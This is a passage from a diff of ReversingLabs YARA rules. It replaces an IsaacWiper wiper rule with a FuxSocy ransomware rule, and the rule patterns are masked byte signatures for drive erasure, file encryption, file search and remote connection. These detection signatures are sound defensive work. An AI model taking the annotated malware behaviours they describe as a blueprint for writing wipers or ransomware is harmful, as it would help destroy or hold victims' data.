-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 33
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 32 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 2E
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 00
-            C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8
+		$remote_connection = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55
+            ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
+            15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ??
+            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 6A
+            ?? 8D 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ??
+            74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ??
+            ?? 8B 55 ?? 83 C2 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D
+            ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 EB ??
+            C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ??
+            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15
         }
-		$erase_drives_recursively_2_p1 = {
-            8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
-            ?? ?? 75 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E1 ?? 0F 84 ?? ?? ?? ?? 0F BE 95 ??
-            ?? ?? ?? 83 FA ?? 75 ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 0F BE 8D ?? ?? ?? ?? 83 F9
-            ?? 75 ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 75 ?? 8B 85 ?? ?? ?? ?? 83 E0 ??
-            74 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 95 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
+		$encrypt_files_1 = {
+            55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ??
+            ?? ?? ?? 89 45 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 03 55 ?? 8D 44 12
+            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? EB
+            ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 7D ?? 8B 45 ?? 8B 4D ?? 8B 55 ?? 8B
+            75 ?? 66 8B 14 56 66 89 14 41 EB ?? B8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 66 89 04 4A C7
+            45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 7D ?? 8B 55 ??
+            03 55 ?? 8B 45 ?? 8B 4D ?? 8B 75 ?? 66 8B 0C 4E 66 89 4C 50 ?? EB ?? 8B 55 ?? 03 55
+            ?? 33 C0 8B 4D ?? 66 89 44 51 ?? 8D 55 ?? 52 8D 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 8B
         }
-		$erase_drives_recursively_2_p2 = {
-            C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? E9 ??
-            ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ??
-            ?? ?? ?? 73 ?? E9 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? FF 95 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
-            51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 55 ?? 8D 8D ?? ?? ??
-            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 50 FF 95 ?? ?? ?? ?? 8B E5 5D C3
+		$encrypt_files_2 = {
+            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83
+            7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0
+            75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
+            ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 4D ?? 51 6A ??
+            8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 99 8B 4D ??
+            2B 4D ?? 8B 75 ?? 1B 75 ?? 89 45 ?? 89 55 ?? 89 4D ?? 89 75 ?? 8B 55 ?? 3B 55 ?? 7C
+            ?? 7F ?? 8B 45 ?? 3B 45 ?? 76 ?? 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55
+            ?? EB ?? 8B 45 ?? 99 89 45 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B
+        }
+		$encrypt_files_3 = {
+            45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 83 7D ??
+            ?? 75 ?? E9 ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 73 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55
+            ?? 8B 45 ?? 50 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ??
+            ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51
+            6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45
+            ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? EB ??
+            E9 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ??
+            74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ??
+            83 7D ?? ?? 74 ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? 7F ?? 8B 4D ?? 3B 4D ??
+            76 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ??
+            8B 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? EB
+        }
+		$search_files = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 8B 4D ?? 8B 94
+            8D ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 33 C0 E9 ?? ?? ??
+            ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 81 ?? ?? ?? ?? 3B 82 ?? ?? ?? ?? 76 ?? B8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? B8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 FF 15 ?? ?? ?? ??
+            85 C0 75 ?? EB ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83 C1
+            ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 74 ?? 8B 4D ?? 81 79 ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ??
+            ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ??
+            81 79 ?? ?? ?? ?? ?? 75 ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ??
+            ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 03 45 ?? 89
+            45 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55 ??
+            81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55
+            ?? 81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B
+            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $destroy_if_not_controller ) and ( $erase_drive_data ) and ( all of ( $erase_drives_recursively_* ) )
+		uint16( 0 ) == 0x5A4D and ( $search_files and ( all of ( $encrypt_files_* ) ) and $remote_connection )
 }
-rule REVERSINGLABS_Win32_Trojan_Isaacwiper : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Fuxsocy : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects IsaacWiper trojan."
+		description = "Yara rule that detects FuxSocy ransomware."
 		author = "ReversingLabs"
-		id = "c0924e5e-a942-57a3-a9f9-e6be6efa4c73"
-		date = "2022-03-02"
-		modified = "2022-03-02"
+		id = "f4a45469-9d51-523f-8238-c7044f353cf6"
+		date = "2021-03-01"
+		modified = "2021-03-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.IsaacWiper.yara#L1-L76"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.FuxSocy.yara#L1-L114"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c9fa43f44c33816a66f61255d101294da63df1afc5a27ed5817072040cd1eec5"
+		logic_hash = "8b3c04eb5d60fcc82e47cb8e78da0a98642666546d6799baef24b56926e3aceb"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "IsaacWiper"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "FuxSocy"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$enumerate_physical_drives = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 33 F6 89 55 ?? 57 89 4D ?? B3 ?? C7 45 ?? ?? ?? ??
-            ?? 89 75 ?? 84 DB 0F 84 ?? ?? ?? ?? 8B D6 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? D1 E8 8D
-            8D ?? ?? ?? ?? BF ?? ?? ?? ?? 89 45 ?? 2B F8 83 C4 ?? 66 83 7D ?? ?? 8D 0C 41 8D 45
-            ?? 74 ?? 83 C0 ?? 66 83 38 ?? 75 ?? 8D 55 ?? 2B C2 D1 F8 8D 04 45 ?? ?? ?? ?? 50 8B
-            C2 8D 14 3F 50 E8 ?? ?? ?? ?? D1 E8 83 C4 ?? 3B C7 8D 48 ?? 0F 46 C1 8B 4D ?? 03 C8
-            89 4D ?? 83 F9 ?? 73 ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 50 B3 ?? FF D7 83 F8 ?? 74 ?? 46 50 89 75 ?? FF 15 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 32 DB E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83
-            ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 85 C0 0F 95 C1 66 85 C0 0F 84 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 45 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? D1 E8 8D 4D ?? BE ?? ?? ?? ?? 89 45 ?? 2B F0 83 C4 ?? 66 83
-            7D ?? ?? 8D 0C 41 8D 45 ?? 74 ?? 83 C0 ?? 66 83 38 ?? 75 ?? 8D 55 ?? 2B C2 D1 F8 8D
-            04 45 ?? ?? ?? ?? 50 8B C2 8D 14 36 50 E8 ?? ?? ?? ?? D1 E8 83 C4 ?? 3B C6 8D 48 ??
-            0F 46 C1 8B 4D ?? 03 C8 89 4D ?? 83 F9 ?? 0F 83 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 FF D7 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 45
-            ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ??
-            ?? ?? ?? 83 F8 ?? 0F 94 C3 75 ?? 33 C0 83 7D ?? ?? 0F 44 45 ?? 89 45 ?? 56 FF 15 ??
-            ?? ?? ?? 84 DB EB ?? 84 C9 0F 84 ?? ?? ?? ?? 8B 5D ?? 8B D3 8B 4D ?? 6A ?? E8 ?? ??
-            ?? ?? 8B 7D ?? 8A C8 83 C4 ?? 33 F6 84 C9 74 ?? 3B F3 74 ?? 6A ?? 8B D6 8B CF E8 ??
-            ?? ?? ?? 8A C8 83 C4 ?? 46 83 C7 ?? 84 C9 75 ?? 46 84 C9 74 ?? 8B 5D ?? 3B F3 73 ??
-            6A ?? 8B D6 8B CF E8 ?? ?? ?? ?? 8A C8 83 C4 ?? 46 83 C7 ?? 84 C9 75 ?? 8A C1 5F 5E
-            5B 8B E5 5D C3
+		$encrypt_files_1 = {
+            83 EC ?? 53 55 57 89 54 24 ?? 8B 54 24 ?? 51 33 DB E8 ?? ?? ?? ?? 8B E8 59 85 ED 0F
+            84 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CB E9
+            ?? ?? ?? ?? 53 53 FF 74 24 ?? 41 FF 74 24 ?? BF ?? ?? ?? ?? FF 74 24 ?? 3B C7 0F 42
+            F8 2B C7 89 4C 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ??
+            FF 74 24 ?? FF 15 ?? ?? ?? ?? 57 FF 74 24 ?? 8D 54 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
+            59 59 57 8D 44 24 ?? 50 FF 74 24 ?? 33 C0 39 44 24 ?? 53 0F 94 C0 89 7C 24 ?? 50 53
+            55 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ??
+            ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 01 7C 24 ??
+            8B 4C 24 ?? 11 5C 24 ?? F6 C1 ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24
+            ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 88 5C 24 ?? FF 74 24 ?? 8B 54 24 ?? 8B 4C 24 ?? E8
+            ?? ?? ?? ?? 59 8B 4C 24 ?? 55 89 41 ?? FF 15 ?? ?? ?? ?? 8A 5C 24 ?? 5F 5D 8A C3 5B
+            83 C4 ?? C3
         }
-		$corrupt_drive_thread = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8B 5D ?? 56 57 85 DB 0F 84 ?? ??
-            ?? ?? 83 7B ?? ?? 0F 85 ?? ?? ?? ?? 8B 43 ?? 8D 4C 24 ?? 03 C0 BA ?? ?? ?? ?? 50 53
-            E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? D1 E8 33 C9 66 89 4C 44 ?? 8D 44 24 ?? 50
-            FF D7 8B 35 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 6A ?? 8D 44 24 ?? 50
-            FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 8D 44 24
-            ?? 74 ?? 90 83 C0 ?? 66 83 38 ?? 75 ?? 8D 4C 24 ?? BA ?? ?? ?? ?? 2B C1 D1 F8 8D 04
-            45 ?? ?? ?? ?? 50 8B C1 8D 8C 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ??
-            ?? ?? ?? 50 FF D7 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 74 24
-            ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 7B ?? 8B 5B ?? C7 44 24 ?? ?? ?? ?? ?? 85 DB 75 ??
-            81 FF ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 8C 84 ?? ?? ?? ?? 8B D1 C1 EA ?? 33 D1 69
-            CA ?? ?? ?? ?? 03 C8 89 8C 84 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? BA ?? ?? ?? ?? 8D
-            B4 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 75 ??
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 8C 94 ?? ?? ?? ?? 8B C1
-            C1 E8 ?? 42 33 C8 89 94 24 ?? ?? ?? ?? 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 25
-            ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 89 06 83 C6 ?? 8D 84 24 ?? ?? ?? ??
-            3B F0 72 ?? 8B 74 24 ?? 8D 44 24 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50
-            56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? 3D ?? ?? ?? ?? 75 ?? 2B F8 83 DB ?? E9
-            ?? ?? ?? ?? 8B C7 0B C3 74 ?? 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44
-            24 ?? 6A ?? 50 57 8D 84 24 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            5F 5E 33 C0 5B 8B E5 5D C2
+		$encrypt_files_2 = {
+            83 EC ?? 53 55 56 8B 74 24 ?? 8B C1 8B 36 57 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ??
+            8B F8 33 D2 8D 5F ?? 8B C6 F7 F3 33 C9 85 D2 0F 95 C1 89 54 24 ?? 33 D2 03 C8 89 4C
+            24 ?? 0F AF CF 89 4C 24 ?? E8 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84 ?? ?? ?? ??
+            33 D2 8B CF E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 64 24 ?? ??
+            48 89 6C 24 ?? 89 44 24 ?? 74 ?? 53 FF 74 24 ?? 89 5C 24 ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 44 24 ?? 57 50 56 33 C0 50 50 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 33 C9 85 FF 74 ?? 8B 54 24 ?? 8D 6E ?? 03 EF 8A 45 ?? 4D 88 04 11 41 3B CF
+            72 ?? 8B 6C 24 ?? 8B 44 24 ?? 03 44 24 ?? 01 5C 24 ?? 89 44 24 ?? 8B 44 24 ?? 40 89
+            44 24 ?? 3B 44 24 ?? 72 ?? 8B 44 24 ?? 85 C0 0F 45 D8 53 FF 74 24 ?? 89 5C 24 ?? 56
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 57 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF 15 ??
+            ?? ?? ?? 8B D8 F7 DB 1A DB 80 E3 ?? 33 C9 85 FF 74 ?? 8B 6C 24 ?? 8D 56 ?? 03 D7 8A
+            02 4A 88 04 29 41 3B CF 72 ?? 8B 6C 24 ?? 8B CE E8 ?? ?? ?? ?? 84 DB 75 ?? 8B CD E8
+            ?? ?? ?? ?? 33 ED EB ?? 32 DB EB ?? 8B 4C 24 ?? 8B 44 24 ?? 89 01 5F 5E 8B C5 5D 5B
+            83 C4 ?? C3
+        }
+		$find_files_1 = {
+            81 EC ?? ?? ?? ?? 53 56 57 8B BC 24 ?? ?? ?? ?? 8B F2 89 74 24 ?? 8B D9 85 FF 0F 84
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B D7 C1 E2 ?? 8B
